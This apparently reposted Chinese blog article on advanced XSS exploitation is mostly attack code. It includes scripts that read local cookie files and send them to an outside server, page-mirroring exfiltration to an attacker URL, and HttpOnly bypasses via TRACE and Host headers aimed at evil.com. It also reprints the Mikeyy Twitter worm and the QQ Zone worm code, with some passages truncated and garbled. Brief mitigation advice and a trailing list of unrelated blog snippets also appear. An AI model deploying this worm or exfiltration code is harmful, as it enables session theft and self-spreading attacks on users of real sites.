xss跨站脚本攻击 (初级-中级-高级)
06-08 阅读数 3547
1.http://192.168.1.3:8080/xss1/xss/example2.php?name=<script>alert("xss")&am... 博文 来自: ExpeditionaryForce的博客
本文将撇开XSS语句,JS脚本,如何无错插入XSS语句,如何过滤和绕过XSS语句过滤,CSRF等知识点.也就是说,你必须已经具备一定XSS知识,才能看懂本文.
如果你还未具备基础XSS知识,以下几个文章建议拜读:
http://www.lib.tsinghua.edu.cn/chinese/INTERNET/JavaScript/ JavaScript中文简介
http://www.google.com/search?q=XSS+���� XSS语句大全
http://www.google.com/search?q=XSS+�ƹ� XSS语句绕过
http://www.80vul.com/dzvul/sodb/03/sodb-2008-03.txt FLASH CSRF
http://bbs.tian6.com/thread-12239-1-1.html 突破XSS字符数量限制执行任意JS代码
http://bbs.tian6.com/thread-12241-1-1.html 利用窗口引用漏洞和XSS漏洞实现浏览器劫持
如果本文内容在你眼里显得非常陌生,或者难以理解,或者干燥无味,那正代表你对XSS了解甚少.
希望天阳会员本着技术学习为主的精神,真正的学习和掌握每门安全技术.因此,如果你来天阳是因为你想真正学会一些什么东西的话,请静下心来,看懂,看透,实际测试弄通本文.那么你对XSS的驾驭能力,自然大幅提高.
如果你认为XSS是无足轻重的问题,只不过是常见的一个弹窗,或者你认为XSS作用域狭窄,或者你认为XSS威力微不足道,那么请先看看以下片段:Twitter遭遇疯狂XSS 6次XSS蠕虫版本变化,
Baidu xss蠕虫 感染了8700多个blog.媒体影响力,关注度巨大
QQ ZONE,校内网XSS 感染过万QQ ZONE.
OWASP MYSPACE XSS蠕虫 20小时内传染一百万用户,最后导致MySpace瘫痪
…
复制代码------------------------------------------介绍-------------------------------------------------------------
什么是XSS?XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的.XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性.
跨站攻击有多种方式,由HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码——例如记录论坛保存的用户信息(Cookie),由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失.当然,攻击者有时也会在网页中加入一些以.JS 或.VBS为后尾名的代码时,在我们浏览时,同样我们也会被攻击到.
如何寻找,如何绕过各种限制,成功无错的执行XSS代码,我们在这里并不讨论.相关的文章在网上也有很多.
复制代码现今XSS替代了SQL-INJECTION,成为web security课题的首位安全问题.XSS已经成为WEB安全的重要课题.
我们在这里重点探讨以下几个问题:
1 通过XSS,我们能实现什么?
2 如何通过HTTP-only保护COOKIES. 又如何突破HTTP-only,又如何补救?
3 XSS的高级利用和高级综合型XSS蠕虫的可行性?
4 XSS漏洞在输出和输入两个方面怎么才能避免.
------------------------------------------研究正题----------------------------------------------------------
通过XSS,我们能实现什么?通过XSS,我们可以获得用户的COOKIES等信息,模拟用户本身进行HTTP提交,读取客户端本地文件,欺骗社工.结合以上功能,我们还能写出综合高级蠕虫.
复制代码XSS的高级利用与及综合性XSS高级蠕虫:我们主要讨论XSS在不同的浏览器下的权限限制&&XSS截屏;镜象网页,http only bypass(Cross-Site Tracing XST).写出我们自己的高级XSS蠕虫
复制代码XSS漏洞在输出和输入两个方面怎么才能避免.
1:为网站各个动态页面分安全等级,划分重点和次重点区域,分等级采用不同的输入限制规则.
2:严格控制输入类型,根据实际需求选用数字,字符,特殊格式的限制.
3:在浏览器端输出时对HTML特殊字符进行了转义,常见采用htmlspecialchars,htmlentities.但是过滤了特殊字符,并不意味就是安全的.很多绕过方法都是争对单纯过滤进行的,譬如URL,8进制,16进制,String.fromCharCode转编码,UBB绕过等.因此应注意每处接受动态输入的代码审计.数据保存在innertxt,标签属性均应处于“”内.
4:Http-only可以采用作为COOKIES保护方式之一.
(I) AJAX在不同的浏览器下的本地文件操作权限:(读取本地的COOKIES,常见的敏感文件如:FTP的INI,etc/shadow,各种第三方应用程序的敏感文件等,并且将内容反馈给攻击者)
我们可以参考空虚浪子心的两篇文章,与及XEYE TEAM的统计信息: 1: ie6可读取无限制本地文件.ie8以及相应版本的trident内核浏览器对ajax本地执行时的权限控制得很死的,看来MS对IE这类安全风险比较重视。(这有一些问题,随后修正!)
2: ff 3.0.8及以下版本允许本地执行的ajax访问当前目录下的文件内容。其他目录暂无法访问。
3: opera9.64及以下版本允许通过指定url为file://协议进行访问;如果文件在当前目录下,则不需要指定file://协议;如果文件在同一盘符下甚至可以超越目录的方式访问:../../boot.ini。
4: 基于webkit内核:google chrome、遨游3.0、safari等浏览器对本地执行的ajax权限没做任何访问限制.
复制代码IE6使用ajax读取本地文件
复制代码FIREFOX 3使用ajax读取本地文件,仅能读取同目录,及其下属目录下文件.
复制代码Google Chrome使用ajax读取本地文件Chrome的cookie默认保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies”
Chrome的历史保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History"
/* Chrome 1.0.154.53 use ajax read local txt file and upload exp www.inbreak.net author voidloafer@gmail.com 2009-4-22 http://www.inbreak.net/kxlzxtest/testxss/a.php get cookie and save. */ header("Content-Disposition: attachment;filename=kxlzx.htm"); header("Content-type: application/kxlzx"); /* set header, so just download html file,and open it at local. */ ?>
复制代码opera 9.52使用ajax读取本地COOKIES文件
var xmlHttp;
function createXMLHttp(){
if(window.XMLHttpRequest){
xmlHttp = new XMLHttpRequest();
}
else if(window.ActiveXObject){
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
}
function startRequest(doUrl){
createXMLHttp();
xmlHttp.onreadystatechange = handleStateChange;
xmlHttp.open("GET", doUrl, true);
xmlHttp.send(null);
}
function handleStateChange(){
if (xmlHttp.readyState == 4 ){
var strResponse = "";
setTimeout("framekxlzxPost(xmlHttp.responseText)", 1000);
}
}
function doMyAjax(user,file)
{
var time = Math.random();
var strPer = 'file://localhost/C:/Documents%20and%20Settings/'+user+'/Cookies/'+file+'?time='+time;
startRequest(strPer);
}
function framekxlzxPost(text)
{
document.getElementById('framekxlzx').src="http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie="+escape(text);
alert(/ok/);
}
doMyAjax(‘administrator’,‘administrator@alibaba[1].txt’);
a.php
复制代码(II) XSS截屏-镜象网页与XSS实现DDOS:
或许你对你女朋友的校内网里的好友列表感兴趣,又或者你对你的客户部竞争对手的电话通信记录感兴趣,那么这个由XEYE TEAM提出的新想法,对你就有用.
利用XSS获得指定的受控者授权状态下的页面源代码,再传发到目标页面,处理好相对路径,那么攻击者就能截取任意一个受控端的授权状态下的镜象网页.达到类似远程控制程序截屏的功能.
代码片段://xmlHttpReq.open(“GET”,“AWebSiteWhichYouNeedToCatch.com”,false);
//xmlHttpReq.open(“GET”,“http://friend.xiaonei.com/myfriendlistx.do”,false);
//xmlHttpReq.open(“GET”,“http://chinatelecom.com/mylistofnopermonth.jsp?no=139xxxxxxxx”,false);
function getURL(s) {
var image = new Image();
image.style.width = 0;
image.style.height = 0;
image.src = s;
}
getURL(“http://urwebsite.com/get.php?pagescopies=”+xmlHttpReq.responseText);
复制代码XSS也能大材小用DDOS? 利用XSS操作COOKIES,导致HEADER部分过大,引发IIS或APACHE等服务端CRASH或者拒绝响应.生效时长与COOKIES允许保存时间相等.
这里引用大风的一段简单代码:
var metastr = “AAAAAAAAAA”; // 10 A
var str = “”;
while (str.length < 4000){
str += metastr;
}
document.cookie = “evil3=” + “” +";expires=Thu, 18-Apr-2019 08:37:43 GMT;"; // 一些老版本的webserver可能在这里还会存在XSS
详细代码请看:http://hi.baidu.com/aullik5/blog/item/6947261e7eaeaac0a7866913.html
复制代码如果你觉得XSS用来DDOS太可惜的话,这里也提供另外一篇文章供你参考,随与XSS无关,但是却也挺有意思.
server limit ddos利用随想 - 空虚浪子心 http://www.inbreak.net/?action=show&id=150
假设msn.com出现了问题,被XSS了.并且攻击者把COOKIES 设置成yahoo.com的.那么所有访问msn.com的用户将无法访问yahoo.com.
攻击者在自己的网站上iframe了server limit ddos,目标设置为竞争对手myass.com,那么所有访问过攻击者网站的人,将无法访问其同行竞争对手myass.com的网站,这样不很妙么?呵呵.
(III) Http only bypass 与 补救对策:
什么是HTTP-ONLY?HTTP-ONLY为Cookie提供了一个新属性,用以阻止客户端脚本访问Cookie.
以下是测试采用HTTPONLY与不采用时,遭受XSS时,COOKIES的保护差别。
复制代码但是采用HTPPONLY就安全了吗?不一定.采用TRACE获得HEADER里的COOKIES:
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i
xmlHttp=request;
xmlHttp.open(“TRACE”,“http://www.vul.com”,false);
xmlHttp.send(null);
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
复制代码但是许多网站并不支持TRACE调试命令,那么我们还可以通过访问phpinfo();页面,筛选带有COOKIE的字段值.var XmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);
XmlHttp.open(“GET”,“http://www.google.com”,false);
XmlHttp.setRequestHeader(“Host”,“www.evil.com/collet.php”);
XmlHttp.send(null);
var resource=xmlHttp.responseText
resource.search(/cookies/);
…
如何防止对方采用TRACE访问你的网站?APACHE可以采用.htaccess来Rewrite TRACE请求
[code]
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]
Squid可以添加以下信息到Squid configuration file (squid.conf),屏蔽TRACE请求
acl TRACE method TRACE
…
http_access deny TRACE
复制代码突破还可以采用XmlHttp.setRequestHeader.通过setRequestHeader,把COOKIES等信息转向到目标页面.
var XmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);
XmlHttp.open(“GET”,“http://www.google.com”,false);
XmlHttp.setRequestHeader(“Host”,“www.evil.com/collet.php”);
XmlHttp.send(null);
复制代码当Apache启动了mod_proxy,还可以使用proxy方式作为中间人方式获得受保护COOKIES.var XmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);
XmlHttp.open(“GET\thttp://www.evil.com/collet.php”,“http://www.vul.site/wherever”,false);
XmlHttp.send(null);
function XHConn(){
var _0x6687x2,_0x6687x3=false;
try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }
catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }
catch(e) { try { _0x6687x2= new XMLHttpRequest(); }
catch(e) { _0x6687x2=false; }; }; };
复制代码第六版: 1. function wait() {
var content = document.documentElement.innerHTML;
var tmp_cookie=document.cookie;
var tmp_posted=tmp_cookie.match(/posted/);
authreg= new RegExp(/twttr.form_authenticity_token = ‘(.*)’;/g);
var authtoken=authreg.exec(content);
var authtoken=authtoken[1];
var randomUpdate= new Array();
randomUpdate[0]= “Be nice to your kids. They’ll choose your nursing home. Womp. mikeyy.”;
randomUpdate[1]= “If you are born ugly blame your parents, if you died ugly blame your doctor. Womp. mikeyy.”;
randomUpdate[2]= “Every man should marry. After all, happiness is not the only thing in life. Womp. mikeyy.”;
randomUpdate[3]= “Age is a very high price to pay for maturity. Womp. mikeyy.”;
randomUpdate[4]= “Ninety-nine percent of all lawyers give the rest a bad name. Womp. mikeyy.”;
randomUpdate[5]= “If your father is a poor man, it is your fate, but if your father-in-law is a poor man, it’s your stupidity. Womp. mikeyy.”;
randomUpdate[6]= “Money is not the only thing, it’s everything. Womp. mikeyy.”;
randomUpdate[7]= “Success is a relative term. It brings so many relatives. Womp. mikeyy.”;
randomUpdate[8]= “‘Your future depends on your dreams’, So go to sleep. Womp. mikeyy.”;
randomUpdate[9]= “God made relatives; Thank God we can choose our friends.Womp. mikeyy.”;
randomUpdate[10]= “‘Work fascinates me’ I can look at it for hours ! Womp. mikeyy.”;
randomUpdate[11]= “I have enough money to last me the rest of my life. (unless I buy something) Womp. mikeyy.”;
randomUpdate[12]= “RT!! @spam Watch out for the Mikeyy worm http://bit.ly/XvuJe”;
randomUpdate[13]= “FUCK. NEW MIKEYYY WORM! REMOVE IT: http://bit.ly/fuSkF”;
randomUpdate[14]= “Mikeyy worm is back!!! Click here to remove it: http://bit.ly/UTPXe”;
var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
var updateEncode=urlencode(randomUpdate[genRand]);
var ajaxConn= new XHConn();
ajaxConn.connect("/status/update",“POST”,“authenticity_token=”+authtoken+_"&status="+updateEncode+"&return_rendered_status=true&twttr=true");
var _0xf81bx1c=“Mikeyy”;
var updateEncode=urlencode(_0xf81bx1c);
var ajaxConn1= new XHConn();
ajaxConn1.connect("/account/settings",“POST”,“authenticity_token=”]+authtoken+"&user[name]="+updateEncode+""+updateEncode+"&user[description]="+updateEncode+"&user[location]="+updateEncode+"&user[protected]=0&commit=Save");
var genXSS=“000; } #notifications{width: expression(document.body.appendChild(document.createElement(‘script’)).src=‘http://runebash.net/xss.js’) #test { color:#333333”;
var XSS=urlencode(genXSS);
var ajaxConn2= new XHConn();
ajaxConn2.connect("/account/profile_settings","“POST,“authenticity_token=”]+authtoken+”&user[profile_sidebar_fill_color]="+XSS+"&commit=save+changes");
} ;
setTimeout(wait(),5250);
复制代码QQ空间XSSfunction killErrors() {return true;}
window.οnerrοr=killErrors;
var shendu;shendu=4;
//---------------global—v------------------------------------------
//通过indexOf函数得到URL中相应的字符串,用于判断是否登录的吧?
var visitorID;var userurl;var guest;var xhr;var targetblogurlid=“0”;
var myblogurl=new Array();var myblogid=new Array();
var gurl=document.location.href;
var gurle=gurl.indexOf("com/");
gurl=gurl.substring(0,gurle+3);
var visitorID=top.document.documentElement.outerHTML;
var cookieS=visitorID.indexOf("g_iLoginUin = ");
visitorID=visitorID.substring(cookieS+14);
cookieS=visitorID.indexOf(",");
visitorID=visitorID.substring(0,cookieS);
get_my_blog(visitorID);
DOshuamy();
//挂马
function DOshuamy(){
var ssr=document.getElementById(“veryTitle”);
ssr.insertAdjacentHTML(“beforeend”,"");
}
//如果创建XMLHttpRequest成功就跳到指定的URL去,这个URL是干什么的就不知道了,没看过,刷人气?
function get_my_blog(visitorID){
userurl=gurl+"/cgi-bin/blognew/blog_output_toppage?uin="+visitorID+"&direct=1";
xhr=createXMLHttpRequest(); //创建XMLHttpRequest对象
if(xhr){ //成功就执行下面的
xhr.open("GET",userurl,false); //以GET方式打开定义的URL
xhr.send();guest=xhr.responseText;
get_my_blogurl(guest); //执行这个函数
}
}
//这里似乎是判断没有登录的
function get_my_blogurl(guest){
var mybloglist=guest;
var myurls;var blogids;var blogide;
for(i=0;i } get_my_testself(); //执行这个函数 } //这里往哪跳就不知道了 function get_my_testself(){ for(i=0;i } } //-------------------------------------- //根据浏览器创建一个XMLHttpRequest对象 function createXMLHttpRequest(){ return XMLhttpObject; } //这里就是感染部分了 function add_js(visitorID,targetblogurlid,gurl){ var s2=document.createElement(‘script’); s2.src=' 展开阅读全文 myurls=mybloglist.indexOf('selectBlog('); //查找URL中"selectBlog"字符串,干什么的就不知道了
if(myurls!=-1){ //找到了就执行下面的
mybloglist=mybloglist.substring(myurls+11);
myurls=mybloglist.indexOf(')');
myblogid[i]=mybloglist.substring(0,myurls);
}else{break;}
var url=gurl+"/cgi-bin/blognew/blog_output_data?uin="+visitorID+"&blogid="+myblogid[i]+"&r="+Math.random();
var xhr2=createXMLHttpRequest(); //创建XMLHttpRequest对象
if(xhr2){ //如果成功
xhr2.open("GET",url,false); //打开上面的那个url
xhr2.send();
guest2=xhr2.responseText;
var mycheckit=guest2.indexOf("baidu"); //找"baidu"这个字符串,找它做什么?
var mycheckmydoit=guest2.indexOf("mydoit"); //找"mydoit"这个字符串
if(mycheckmydoit!="-1"){ //返回-1则代表没找到
targetblogurlid=myblogid[i];
add_jsdel(visitorID,targetblogurlid,gurl); //执行它
break;
}
if(mycheckit=="-1"){
targetblogurlid=myblogid[i];
add_js(visitorID,targetblogurlid,gurl); //执行它
break;
}
}
var XMLhttpObject=null;
if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}
else
{ var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];
for(var i=0;i
06-08 阅读数 3547
1.http://192.168.1.3:8080/xss1/xss/example2.php?name=<script>alert("xss")&am... 博文 来自: ExpeditionaryForce的博客
01-16 阅读数 2965
前言学习XSS注入很久了,XSS主要的情况三分天下:反射型、存储型、DOM型;今天要研究的是XSS的利用,曾经有人问我XSS怎么利用的,我也只知道XSS在网页中嵌入代码,获取目标IP、Cookie,但... 博文 来自: u011215939的博客
04-13 阅读数 830
一、寻找XSS1、找到可控参数URL参数输入表单HTTP头部信息(user-agent、ip、location、referrer等)2、找到参数输出点HTML标签JavaScript事件DOM型3、精... 博文 来自: qq_34304107的博客
12-20 阅读数 267
前言xss的介绍就不多说了,搜索一下一大堆值得详细研究,有本书讲的挺透彻《XSS跨站脚本攻击剖析与防御》。如果你对前端的代码不是很了解或者不是太熟悉,那么使用自动化的工具进行模糊测试,是你不错的选择,... 博文 来自: zhaji001
11-20 阅读数 25
XSS的高级利用部分总结-蠕虫,HTTP-only,AJAX本地文件操作,镜象网页本帖最后由racle于2009-5-3009:19编辑XSS的高级利用总结-蠕虫,HTTPONLY,AJAX本地文件操... 博文 来自: weixin_34224941的博客
04-23 阅读数 178
个人博客:9ouu.cn为什么要选择自己搭建平台?毕竟接触的是敏感的东西,网上也有很多公共的平台,感觉不怎么安全。经过两天的折腾,查看各种文章,总结出这个搭建方法。这个也可以在虚拟机上搭建,唯一不好的... 博文 来自: jiyongx的博客
11-17 阅读数 1707
0x00XSSPlatform介绍XSS漏洞的利用一直以来有各种各样的方式,不过XSS平台无疑是其中的佼佼者。XSSPlatform集成了一些常见的XSSPayload,可以很方便的利用漏洞对网站进行... 博文 来自: Trinity
02-14 阅读数 81
最近公司的secutiryteam扫描代码加了新的XSS规则,发现以前用的简单的htmlFormatEdit都失效了。最后转向esapi,才将问题解决:https://www.owasp.org/in... 博文 来自: 水草萍的博客
05-16 阅读数 12
1.定位页面可以出现xss的位置可能会出现联合点利用一个页面多个存储位置或者一个页面多个参数联合利用例如输入xss查看页面源码页面里有多个xss或者多个参数显示可以利用需要注意的是有的是js动态加载标... 博文 来自: weixin_30635053的博客
06-26 阅读数 706
dedecmsxssoday通杀所有版本(T00ls首发)byharis作者:haris漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell为什么说它是ODay呢,能getshell的... 博文 来自: 收集盒 Book box
03-27 阅读数 35
以往对XSS的利用大多数都是针对于挂马,钓鱼,盗cookie等,这些方式并没有真正发挥到XSS的作用,因为很少人能了解XSS的实质,会话劫持,浏览器劫持,XSS能做到的东西远远超乎我们的想象。一XSS... 博文 来自: weixin_34378922的博客
04-17 阅读数 1209
相信大家在做渗透测试的时候都有过这样的经历,明明一个XSS的漏洞,但是却有XSS过滤规则或者WAF保护导致我们不能成功利用,比如我们输入alert("hi"),会被转换为alert(>xss dete... 博文 来自: xysoul的专栏
05-20 阅读数 1391
简易搭建个人轻量级XSS服务器操作系统:Centos6.6web容器:Apache脚本语言:PHP一、 XSS平台的搭建过程1、安装Apache#安装Apacheyuminstallhttpd–y#启... 博文 来自: worwick的博客
04-12 阅读数 757
0x01环境搭建apache安装在ubuntu下安装apache2很简单,只要用apt-getinstallapache2就可以了,安装完成后,在/etc/apache2/路径下,有个apache2.... 博文 来自: u011342224的博客
06-24 阅读数 1万+
需要修改的地方比较多,目前已基本可用,还在学习摸索中。。。1、将xssplatform.sql中的xsser.me/修改为实际使用的URL,如localhost:6666/xss/2、修改themes... 博文 来自: blrk
05-18 阅读数 114
XSS(反射性)跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击;XSS可以盗取客户端cookie,将客户端重定向到第三方网站;一、l... 博文 来自: haha1314的博客
09-04 阅读数 2317
实验来源:合天网安实验室 博文 来自: giantbranch的专栏
03-21 阅读数 506
sdsdsdsdsada 博文 来自: Playwin
01-03 阅读数 1106
本文主要介绍如何结合xss平台利用xss漏洞然后,伪造一个钓鱼登陆页,然后,实现钓鱼,获取用户和密码,之后传到我们的公网服务器中首先我们需要一个存在xss漏洞的网站,不管是反射或存储,只要它有txtx... 博文 来自: 2ed
01-05 阅读数 297
xss漏洞利用原理存在xss漏洞的留言板,提交留言的内容为js代码,xss漏洞会直接执行,可以利用这个漏洞还将登录到留言页面的所有的主机的信息打到一个指定的位置,可以自己架设一个平台或者,打到xss平... 博文 来自: haodawei123的博客
08-28 阅读数 2万+
想深入学习一下XSS相关知识的,快看这里。 博文 来自: 爱测未来团队博客
06-20 阅读数 7441
一:XSS漏洞总结1&amp;amp;gt;:简介XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里... 博文 来自: MX的博客
10-09 阅读数 2714
XSS测试用例:https://blog.csdn.net/liu_xp_mother/article/details/74990442为什么需要会话管理?http是无状态的,一次请求结束连接断开,服... 博文 来自: jpygx123的博客
09-18 阅读数 1234
1.xss平台搭建l将xss平台源码放置在网站目录下l进入MySQL管理界面中的phpMyAdmin界面,新建一个XSS平台的数据库l修改XSS源码文件目录下的config.php中的数据库连接字段,... 博文 来自: qianxiao996欢迎您
04-16 阅读数 5954
XSS攻击是一种攻击者将JavaScript代码注入到用户运行页面中的攻击。为了避免这种攻击,一些应用会尝试从用户输入中移除JavaScript代码,但这很难完全实现。在本文中会先展示一些尝试过滤Ja... 博文 来自: Fly_鹏程万里
01-22 阅读数 312
使用蓝莲花开源的平台:https://github.com/firesunCN/BlueLotus_XSSReceiver 安装步骤为:安装httpserver与php环境(ubuntu: sudo... 博文 来自: 幸福诗歌的博客
11-15 阅读数 875
XSS平台搭建全过程从网上下载最新的wamp3.0.6和XSSPlatform。1、安装wamp,将XSSPlatform源码放到wamp的www目录下,文件夹取名为xss。2、运行wamp。如果wa... 博文 来自: zhangyingjie1982的博客
12-08 阅读数 1
一、背景XSSPlatform是一个非常经典的XSS渗透测试管理系统,原作者在2011年所开发,由于后来长时间没有人维护,导致目前在PHP7环境下无法运行。笔者最近花了一点时间将源码移植到了PHP7环... 博文 来自: chuqu3970的博客
09-05 阅读数 1660
实验来源:合天网安实验室 博文 来自: giantbranch的专栏
04-23 阅读数 4179
setTimeout("window.location.href='http://www.discuz.net/./a';alert(document.cookie);a='';",3000);1.在... 博文 来自: byteway的专栏
02-20 阅读数 731
怎么说呢,我也用过xssme,感觉的确不错。还可以共享。但是我感觉就如果你自己一个人想使用,那些功能未免太过冗余。所以我写了个相当于xssme中默认模块的一个工具给大家看下。以生成文件为保存方式。大牛... 博文 来自: 风炫 致力于顶级网络安全专家
01-23 阅读数 771
挖掘过程一: 自从上一次投稿,已经好久好久没写文章了。今天就着吃饭的时间,写篇文章,记录下自己学习xss这么久的心得。在我看来。Xss就是javascript注入,你可以在js语法规定的范畴内做任... 博文 来自: h4ck0ne的博客
07-14 阅读数 2万+
1、beef基本配置BeEF在Kali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf1、修改config.yaml编辑... 博文 来自: jiangliuzheng的专栏
11-12 阅读数 7451
最近对自己的项目进行了xss攻击,想找到还存在什么漏洞;玩着玩着玩上瘾了,顺手帮别人的网站做了测试,结果时,不费一兵一卒就轻易拿下;还可以进行CSRF攻击,攻击别人的帐号.xss的危害可小可大;比如弄... 博文 来自: 前端小工
12-27 阅读数 7万+
一、简介什么是XSS?百度百科的解释: XSS又叫CSS (CrossSiteScript),跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面... 博文 来自: fendo
03-05 阅读数 2万+
DOM,全称DocumentObjectModel,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOM型XSS其实是一种特殊类型的反射型XSS,它是基于D... 博文 来自: Mi1k7ea
10-17 阅读数 5089
docker学习笔记 常用的镜像: docker pull anibali/pytorch:cuda-10.0 Docker是什么? Docker是一个虚拟环境容器,可以将你的开发环境、代... 博文
08-26 阅读数 3万+
每一个程序员都有一个梦想,梦想着能够进入阿里、腾讯、字节跳动、百度等一线互联网公司,由于身边的环境等原因,不知道 BAT 等一线互联网公司使用哪些技术?或者该如何去学习这些技术?或者我该去哪些获取这些... 博文
09-04 阅读数 12万+
目录 1、搜索引擎 2、PPT 3、图片操作 4、文件共享 5、应届生招聘 6、程序员面试题库 7、办公、开发软件 8、高清图片、视频素材网站 9、项目开源 10、在线工具宝典大全... 博文
09-06 阅读数 1万+
在公司项目的开发过程中,需要编写shell脚本去处理一个业务,在编写过程中发现自身对shell脚本的知识不够完善,顾整理一下,本文章主要内容来自菜鸟教程 , 也添加了一些知识点 shell脚本? 在... 博文
09-10 阅读数 2万+
欢迎添加华为云小助手微信(微信号:HWCloud002或HWCloud003),验证通过后,输入关键字“加群”,加入华为云线上技术讨论群;输入关键字“最新活动”,获取华为云最新特惠促销。华为云诸多技术... 博文
09-21 阅读数 7万+
起因 又到深夜了,我按照以往在csdn和公众号写着数据结构!这占用了我大量的时间!我的超越妹妹严重缺乏陪伴而 怨气满满! 而女朋友时常埋怨,认为数据结构这么抽象难懂的东西没啥作用,常会问道... 博文
09-13 阅读数 3万+
写在前边 数据结构与算法: 不知道你有没有这种困惑,虽然刷了很多算法题,当我去面试的时候,面试官让你手写一个算法,可能你对此算法很熟悉,知道实现思路,但是总是不知道该在什么地方写,而且很多边界条件想不... 博文
09-16 阅读数 13万+
今天给大家带来点快乐,程序员才能看懂。 来源:https://zhuanlan.zhihu.com/p/47066521 1. 公司实习生找 Bug 2.在调试时,将断点设... 博文
09-21 阅读数 3万+
目录 1、AdminLTE 2、vue-Element-Admin 3、tabler 4、Gentelella 5、ng2-admin 6、ant-design-pro 7、blur-a... 博文
09-23 阅读数 8万+
欢迎添加华为云小助手微信(微信号:HWCloud002或HWCloud003),验证通过后,输入关键字“加群”,加入华为云线上技术讨论群;输入关键字“最新活动”,获取华为云最新特惠促销。华为云诸多技术... 博文
09-27 阅读数 3万+
我本科学校是渣渣二本,研究生学校是985,现在毕业五年,校招笔试、面试,社招面试参加了两年了,就我个人的经历来说下这个问题。 这篇文章很长,但绝对是精华,相信我,读完以后,你会知道学历不好的解决方案... 博文
09-29 阅读数 4万+
很早就想过做点小游戏了,但是一直没有机会动手。今天闲来无事,动起手来。过程还是蛮顺利的,代码也不是非常难。今天给大家分享一下~ 一、介绍 开发语言:C语言 开发工具:Dev-C++ 5.11 日期:2... 博文
09-29 阅读数 2万+
Java 的每个基本类型都对应了一个包装类型,比如说 int 的包装类型为 Integer,double 的包装类型为 Double。基本类型和包装类型的区别主要有以下 4 点。... 博文
10-10 阅读数 2万+
许多人在数据科学、机器学习、web开发、脚本编写和自动化等领域中都会使用Python,它是一种十分流行的语言。 Python流行的部分原因在于简单易学。 本文将简要... 博文
10-16 阅读数 5018
前言 说起线程池大家肯定不会陌生,在面试中属于必问的问题之一,特别是对于高并发有较高要求的企业,基本是核心打分点。网上关于线程池的文章和视频很多,本篇文章旨在帮助大家快速了解和掌握线程池的原理,对于... 博文
10-11 阅读数 9502
作者:阿波、纯洁的微笑漫画:宁州枪手程序员如今已经发展成社会的主流职业,以至于街头的王大妈李大爷都能说出一二来,据说他们认为的程序员是这样子的:程序员都是秃头,秃的越狠越...... 博文
10-12 阅读数 1万+
作者 | 小鹿 来源 | 公众号:小鹿动画学编程 写在前边 TCP 三次握手过程对于面试是必考的一个,所以不但要掌握 TCP 整个握手的过程,其中有些小细节也更受到面试官的青睐。 对于这部分掌握... 博文
10-13 阅读数 7320
十年到底有多长?当我回顾过去的十年,发现好短,可以讲的事情没有几件,而且都是坏事;当我畅想未来的十年,感觉又好长,不知道路怎么走。... 博文
10-14 阅读数 1万+
GitHub 8.8k Star 的Java工程师成神之路 ,不来了解一下吗? GitHub 8.8k Star 的Java工程师成神之路 ,真的不来了解一下吗? GitHub 8.8k Star 的... 博文
10-12 阅读数 3142
在日常使用过程中,作为时下主流操作系统之一的 Linux,还存在哪些坑?以及从它的应用过程中,我们还可以挖掘出哪些鲜为人知的奥秘?作者 |Nebojsa.todorov...... 博文
10-12 阅读数 8185
在程序员的职业生涯中,记住所有你接触过的代码是一件不可能的事情!那么我们该如何解决这一问题?作者 |Dylan Mestyanek译者 | 弯月,责编 | 屠敏出品 |...... 博文
10-13 阅读数 8038
阅读本文大概需要 2.8 分钟。在温室里呆习惯了,就很难去适应室外环境,在一个圈子呆久了,就会把一切都会当成是理所当然,不想再去适应第二个圈子,即使他们可能更好。很多人觉...... 博文
10-19 阅读数 5004
#最近新学了爬虫,写了一个爬取一个写真网站的code 网站 代码如下 import requests from bs4 import BeautifulSoup def get_main_urls... 博文
10-14 阅读数 7800
Sentinel 承接了阿里巴巴近 10 年的双十一大促流量的核心场景本文介绍阿里开源限流熔断方案 Sentinel 功能、原理、架构、快速入门以及相关框架比较基本介绍1...... 博文
10-16 阅读数 1万+
